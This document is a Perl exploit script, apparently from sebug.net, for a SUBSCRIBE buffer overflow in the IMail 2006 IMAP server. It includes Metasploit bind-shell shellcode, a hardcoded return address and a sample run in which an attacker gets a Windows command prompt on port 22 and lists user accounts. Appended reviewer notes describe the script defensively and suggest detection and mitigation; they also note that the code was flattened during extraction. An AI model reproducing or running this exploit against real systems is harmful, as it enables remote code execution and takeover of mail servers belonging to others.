#!/use/bin/perl # Test on Imail 2006(9.10), imap4d32.exe(6.8.8.1), windows 2003 Chinese SP1 # Code by yunshu, our team: www.ph4nt0m.org Mail list: http://list.ph4nt0m.org #F:>perl imail_SUBSCRIBE.pl 192.168.1.2 test_user test_pass #* OK IMAP4 Server (IMail 9.10) #0 OK LOGIN completed #* FLAGS (Answered Flagged Deleted Seen Draft) #* 0 EXISTS #* 0 RECENT #* OK [UIDVALIDITY 1185270594] UIDs valid #* OK [UIDNEXT 485270595] Predicted next UID #2 OK [READ-WRITE] SELECT completed #3 OK SUBSCRIBE completed #Trying.. #Bingle!Maybe get it! #You can try to telnet 22 port, do you have nc? #D:Microsoft Visual Studio 8VC>nc -vv 192.168.1.2 22 #192.168.1.2: inverse host lookup failed: h_errno 11004: NO_DATA #(UNKNOWN) [192.168.1.2] 22 (?) open #Microsoft Windows [.. 5.2.3790] #(C) .... 1985-2003 Microsoft Corp. #C:WINDOWSsystem32>net user #net user #\ ..... #------------------------------------------------------------------------------- #Administrator ASPNET Guest #IUSR_WIN2K3 IWAM_WIN2K3 SUPPORT_388945a0 #.................. #C:WINDOWSsystem32> use strict; use warnings; use IO::Socket; if( @ARGV != 3 ) { my $banner = qq{ Imail subscribe exploit, Test on Imail 2006(9.10),windows 2003 Chinese SP1 You must have a account to login the imap server, good luck! Code by yunshu, our team www.ph4nt0m.org, enjoin this exp~~ imail_subscribe.pl <host> <username> <password> }; print $banner." "; exit( -1 ); } my $host = $ARGV[0]; my $user = $ARGV[1]; my $pass = $ARGV[2]; # win32_bind - EXITFUNC=thread LPORT=22 Size=344 Encoder=Pex http://metasploit.com my $shellcode = "x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x41". "xd1xfdxbcx83xebxfcxe2xf4xbdxbbx16xf1xa9x28x02x43". "xbexb1x76xd0x65xf5x76xf9x7dx5ax81xb9x39xd0x12x37". "x0exc9x76xe3x61xd0x16xf5xcaxe5x76xbdxafxe0x3dx25". "xedx55x3dxc8x46x10x37xb1x40x13x16x48x7ax85xd9x94". "x34x34x76xe3x65xd0x16xdaxcaxddxb6x37x1excdxfcx57". "x42xfdx76x35x2dxf5xe1xddx82xe0x26xd8xcax92xcdx37". "x01xddx76xccx5dx7cx76xfcx49x8fx95x32x0fxdfx11xec". 
"xbex07x9bxefx27xb9xcex8ex29xa6x8ex8ex1ex85x02x6c". "x29x1ax10x40x7ax81x02x6ax1ex58x18xdaxc0x3cxf5xbe". "x14xbbxffx43x91xb9x24xb5xb4x7cxaax43x97x82xaexef". "x12x82xbexefx02x82x02x6cx27xb9xfdxaax27x82x74x5d". "xd4xb9x59xa6x31x16xaax43x97xbbxedxedx14x2ex2dxd4". "xe5x7cxd3x55x16x2ex2bxefx14x2ex2dxd4xa4x98x7bxf5". "x16x2ex2bxecx15x85xa8x43x91x42x95x5bx38x17x84xeb". "xbex07xa8x43x91xb7x97xd8x27xb9x9exd1xc8x34x97xec". "x18xf8x31x35xa6xbbxb9x35xa3xe0x3dx4fxebx2fxbfx91". "xbfx93xd1x2fxccxabxc5x17xeax7ax95xcexbfx62xebx43". "x34x95x02x6ax1ax86xafxedx10x80x97xbdx10x80xa8xed". "xbex01x95x11x98xd4x33xefxbex07x97x43xbexe6x02x6c". "xcax86x01x3fx85xb5x02x6ax13x2ex2dxd4xaex1fx1dxdc". "x12x2ex2bx43x91xd1xfdxbc"; my $sock = IO::Socket::INET->new( PeerHost=>$host, PeerPort=>"143", proto=>"tcp" ) || die "Connect error. "; my $res = <$sock>; print $res; if( $res !~ /OK/ ) { exit( -1 ); } my $opcode = "x60x1Ax9Cx76"; #my $opcode = "x61x62x63x64"; my $num = 264991; my $nop = "#IMAILPUB" . "x90" x ( $num - length($shellcode) ).$shellcode."x90x90xebx06".$opcode."x90x90x90x90"."xE9x44xfdxffxff"."x90" x 400; # login print $sock "0 LOGIN $user $pass "; $res = <$sock>; if( ! defined($res) ) { exit(-1); } print $res; if( $res !~ /OK/ ) { exit(-1); } print $sock "2 SELECT INBOX "; while( <$sock> ) { print $_; if( $_ =~ /2 OK/ || $_ =~ /2 BAD/ ) { last; } } print $sock "3 SUBSCRIBE "$nop" "; $res = <$sock>; if( ! defined($res) ) { exit(-1); } print $res; print "Trying.. "; sleep( 15 ); print "Bingle! Maybe get it! You can try to telnet 22 port, do you have nc? "; print $sock "4 LOGOUT "; print <$sock>; $sock->close(); # sebug.net
# ---------------------------------------------------------------------------
# Reviewer notes: a defensive reading of the listing above.
#
# Purpose: proof-of-concept client that connects to an IMAP server on TCP 143,
# logs in, selects INBOX and sends a single SUBSCRIBE command whose mailbox
# argument is a very long crafted string. The author's header states it was
# tested against IMail 2006 (9.10), imap4d32.exe 6.8.8.1, on Windows 2003
# Chinese SP1.
#
# State of this copy: page extraction flattened the script onto two physical
# lines, so it does not parse as Perl as shown. Read it as a record of the
# technique rather than as a runnable file.
#
# Preconditions visible in the code: exactly three arguments (host, username,
# password), and the LOGIN reply must contain "OK" before anything further is
# sent. The vulnerable path is therefore reached only after authentication
# with a valid mailbox account.
#
# Request shape: $nop begins with the literal "#IMAILPUB" and is padded using
# $num = 264991, so the SUBSCRIBE argument is roughly 265 KB -- far beyond any
# legitimate mailbox name. $opcode is a hard-coded four-byte value, presumably
# an address tied to the tested build and language pack -- TODO confirm.
#
# Payload and visible outcome: the author's comment labels $shellcode as
# "win32_bind ... LPORT=22", and the pasted transcript shows a Windows command
# prompt answering on port 22 of the target after the 15-second sleep.
#
# Detection ideas:
#   - IMAP SUBSCRIBE (or other mailbox-name commands) on port 143 whose
#     argument length is orders of magnitude above a normal mailbox name; a
#     length threshold is more robust than matching these payload bytes.
#   - The tagged sequence "0 LOGIN" / "2 SELECT INBOX" / "3 SUBSCRIBE" in
#     IMAP logs, followed by a stalled session or a service fault.
#   - A new listener on TCP 22 on a Windows mail host, or a command
#     interpreter started by the IMAP service process (presumably
#     imap4d32.exe -- verify on the host).
#
# Mitigation: move to a vendor release that fixes the SUBSCRIBE handling (the
# fixed version is not stated on this page), restrict which networks can
# reach IMAP, and block unexpected inbound ports on the mail server with a
# host firewall. Because the attack needs a working login, weak or shared
# mailbox credentials widen the exposure.
# ---------------------------------------------------------------------------